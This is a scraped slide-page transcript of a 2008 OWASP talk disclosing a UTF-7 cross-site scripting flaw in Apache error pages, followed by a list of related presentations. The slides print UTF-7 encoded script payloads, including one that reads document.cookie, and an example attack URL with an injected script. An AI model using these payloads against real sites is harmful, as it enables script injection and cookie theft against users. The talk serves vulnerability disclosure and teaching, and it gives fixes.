Presentation is loading. Please wait.

Presentation is loading. Please wait.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Published byJohnathan Richard Modified over 7 years ago

Similar presentations

Presentation on theme: "Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP."— Presentation transcript:

1 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org UTF7 XSS - Apache and Others Yaniv Miron aka “Lament” YanivM@ComsecGlobal.com Israel 2008 September 14

2 OWASP 2 Disclaimers  This information is for learning purposes only.  Do NOT attack the site example.com.  The pictures in this presentation was freely available on the net as far as I know.

3 OWASP 3 General  New vulnerability.  Attack any Apache web server (May 2008).  Found in April 2008 by Yaniv Miron and Yossi Yakobov and published in May 2008.

4 OWASP 4 Cross Site Scripting aka “XSS”  What is XSS?  Computer security vulnerability typically found in web applications which allow code injection by malicious web users.  Examples  [URL] alert(31337)  [URL] alert(document.cookie)

5 OWASP 5 UTF7 Character Encoding  What is UTF7?  One of the many character encoding available.  Examples:  alert(31337)  +ADw-script+AD4-alert(31337)+ADw-/script+AD4-  alert(document.cookie)  +ADw-script+AD4-alert(document.cookie)+ADw- /script+AD4-

6 OWASP 6 Apache Web Server  What is Apache?  Well come on...

7 OWASP 7 The Vulnerability  A bit complicated.  Not fully automatic.  Infrastructure & Application attack.  All of the Apache versions are vulnerable (May 2008).

8 OWASP 8 Vulnerability Parts  Built from:  Web site that uses Apache web server.  HTML Injection.  UTF 7 XSS string.

9 OWASP 9 The String  Who knows what is behind this string? What kind of encoding/encryption it contains?  Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj 2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5M aZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdi m3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviP x7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhj oIaHE1SQPhU5VReCz1olPh5jZ

10 OWASP 10 Example  http://www.example.com/Znl5g3k70ZaBUPYmN 5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3F u7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJR RuPe5UahFwOblMXsIPTGh3pVjTLdim3vu TKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7t YYeOgc8HU46gaecJwnHY7f6GlQB8H6k BFhjoIaHE1SQPhU5VReCz1olPh5jZ+ADw- script+AD4-alert(‘UTF7 XSS Attack')+ADw- /script+AD4-

11 OWASP 11 Example - 2 nd part

12 OWASP 12 Future Development  Fully automatic attack

13 OWASP 13 Responses  Security Focus  Apache  Microsoft  HP

14 OWASP 14 How to Fix  Check:  Encoding.  Inputs.  Use non default 403/404 and other error pages.

15 OWASP 15 References  Security Focus  BID: www.securityfocus.com/bid/29112www.securityfocus.com/bid/29112  Exploit Example: http://downloads.securityfocus.com/vulnerabilities/ex ploits/29112.html http://downloads.securityfocus.com/vulnerabilities/ex ploits/29112.html  HP  http://alerts.hp.com/r?2.1.3KT.2ZR.xg7ek.CTm6em..T.EpPS.1Zqm.KdCEfL00 http://alerts.hp.com/r?2.1.3KT.2ZR.xg7ek.CTm6em..T.EpPS.1Zqm.KdCEfL00  Just Google my name “Yaniv Miron” =]

16 OWASP 16 [-] E0F [-]  Thank you for listening!  Yaniv Miron aka “Lament” - Comsec Consulting  YanivM@ComsecGlobal.com YanivM@ComsecGlobal.com  Yossi Yakobov - Comsec Consulting  YossiY@ComsecGlobal.com YossiY@ComsecGlobal.com

Download ppt "Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP."

Similar presentations

Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.

Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Copyright © 2006 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.

The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
March Intensive: XSS Exploits

March Intensive: XSS Exploits
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Copyright © 2006 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Similar presentations

Ads by Google